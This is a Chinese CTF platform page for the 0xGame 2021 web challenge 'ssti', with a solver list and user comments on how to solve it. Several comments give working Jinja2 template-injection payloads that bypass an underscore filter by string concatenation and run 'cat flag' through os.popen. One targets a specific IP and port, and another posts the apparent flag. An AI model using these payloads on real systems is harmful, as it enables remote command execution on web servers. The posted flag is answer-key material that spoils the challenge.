sstiWEB 未解决

分数: 0 金币: 0
所属赛事: 0xGame 2021
题目作者: 未知
一  血: Lamb
一血奖励: 0金币
解  决: 158
提  示:
描  述:
0xGame{}
评论
r1ng_13 2月前

找到注入点,分镜直接秒

回复 0

nakanodarling 1年前

fenjing

回复 0

yaozhiwang 1年前

0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}

回复 0

xiaobai568 2年前

wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html

回复 0

WCRH 2年前

首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)

回复 0

单手压FL 2年前

search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 0

jz1111 2年前

http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 1

2728462336 2年前

爆出传参search,利用字符串拼接绕过

回复 0

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

DangerHe 攻破了该题 1天前
hhhh1213 攻破了该题 9天前
HamiLemon 攻破了该题 15天前
lalala2022 攻破了该题 18天前
kuku1024 攻破了该题 29天前
orr_ 攻破了该题 1月前
xujunjjj 攻破了该题 1月前
un 攻破了该题 1月前
devilrun 攻破了该题 1月前
mr.zhao 攻破了该题 1月前
huangwj 攻破了该题 1月前
lizhibin 攻破了该题 2月前
3xsh0re 攻破了该题 2月前
r1ng_13 攻破了该题 2月前
dyh1213 攻破了该题 2月前
linggin 攻破了该题 3月前
mhjmhu 攻破了该题 3月前
yttitan 攻破了该题 3月前
2790819062 攻破了该题 3月前
litt 攻破了该题 4月前
问题反馈